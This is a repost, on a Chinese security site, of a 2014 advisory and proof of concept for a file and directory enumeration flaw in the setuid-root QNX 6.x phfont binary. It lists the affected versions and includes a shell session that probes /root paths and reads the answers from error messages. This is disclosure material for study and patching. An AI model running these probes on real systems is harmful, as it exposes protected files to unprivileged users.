首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
QNX 6.x phfont Enumeration
来源:vincitamorpatriae@gmail.com 作者:cenobyte 发布时间:2014-03-11  
#
# QNX 6.x phfont file and directory enumeration vulnerability by cenobyte 2014
#                         <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /usr/photon/bin/phfont allows any non-root user to enumerate
# files and directories as root due to PfAttachLocalDllArgv() error messages.
#
# You can discover files and directories by observing the following error
# messages and behaviour:
#
# 1) PfAttachLocalDllArgv(): Function not implemented
#	A file exists.
# 2) PfAttachLocalDllArgv(): No such file or directory
#	A directory does not exist.
# 3) And nothing will be returned when a directory exists.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.0
#
# - not vulnerable:
# QNX 6.3.0

$ id
uid=100(user) gid=100

$ /usr/photon/bin/phfont -A -d /root/.ph
$ /usr/photon/bin/phfont -A -d /root/doesnotexist
$ PfAttachLocalDllArgv(): No such file or directory

$ /usr/photon/bin/phfont -A -d /root/.profile
$ PfAttachLocalDllArgv(): Function not implemented

# ls -l /root
total 13
drwx------  5 root      root           1024 Jan 07 16:24 .
drwxr-xr-x 16 root      root           1024 Oct 09 15:03 ..
-rw-rw-r--  1 root      root             51 Jan 24 01:15 .lastlogin
drwx------  3 root      root           1024 Sep 26 18:03 .mozilla
drwxrwxr-x  3 root      root           1024 Sep 27 15:36 .ph
-rw-r--r--  1 root      root            191 Apr 20  2001 .profile
drwx------  2 root      root           1024 Sep 26 18:11 .ssh

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·QNX 6.x phgrafx File Enumerati
·QNX 6.x Photon Denial Of Servi
·QNX 6.4.x/6.5.x pppoectl - Inf
·ClipSharePro 4.1 Local File In
·QNX 6.5.0 x86 phfont - Local r
·Yokogawa CENTUM CS 3000 BKHOde
·QNX 6.5.0 x86 io-graphics - Lo
·Yokogawa CENTUM CS 3000 BKBCop
·QNX 6.4.x/6.5.x ifwatchd - Loc
·Oracle VirtualBox 3D Accelerat
·Safari User-Assisted Download
·KMPlayer 3.8.0.117 Buffer Over
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved